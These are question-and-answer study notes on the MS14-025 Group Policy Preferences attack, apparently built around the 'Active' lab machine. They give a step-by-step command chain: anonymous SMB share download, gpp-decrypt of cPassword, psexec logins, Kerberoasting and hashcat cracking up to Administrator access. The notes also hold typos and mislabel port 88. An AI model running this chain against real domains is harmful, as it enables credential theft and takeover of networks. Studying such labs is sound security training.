Group policty Preferences Attack (GPP) MS14-025

Question 1

Whare are GPP attacks (5) ?

Answer 1

Group policty Preferences Attack (GPP) AKA MS14-025

-GPP allowed admins to creates policies using embedded credentials
- Theses credentials were encrypted and placed in a “cPassword”
- the key was accidentally released
- Patched in MS14-025 but doesn’t prevent previous uses

Question 2

What is MS14-025 attack ?

Answer 2

Group Policy Preferences (GPP) attack

Question 3

Steps of GPP attack (8) and post exploitation (4) ? (without metasploit)

Answer 3

1- Scan for DC with Nmap
nmap -T5 IP

2- Find SMB shares
**smbclient -L \\IP\ ** (Empty password = annonymous connection)

3- Find SMB share with annonymous access (“here Replication”)

smbclient \\IP\Replication

4- On SMB Share
**smb: > prompt off
smb: > recurse on
smb: > mget *
**

5- Search for Groups.xml file (contains GPP embeded cPassword) (we get full path with mget to find this file)

6- Open the file and find cPassword fields

7- Decrypt it: gpp-decrypt CPASSWORD_VALUE

8- Boom you get password on last line of output

So now you have :
- a username from group.xml file “active.htb\SVC_TGS”
- a password from decrypted cPassword value

9- Use credentials on DC to find writable share
psexec.py active.htb/svc_tgs:password@IP_DC

10- If no writable share available: => Kerberoasting:
GetUserSPNs.py active.htb/svc_tgs:Password@IP_DC -request

11- Crack the hash
hashcatr -m 13100 hashs.txt rockyou.txt -O

12- Log in as Administrator account if any (Boom get admin access)
psexec.py active.htb/Administrator:Password@IP_DC

Question 4

What to expect from nmap scan of DC ?

Answer 4

• Port 53 DNS
• Port 88 Kerberoast
• Port 389 LDAP
• Port 636 LDAPS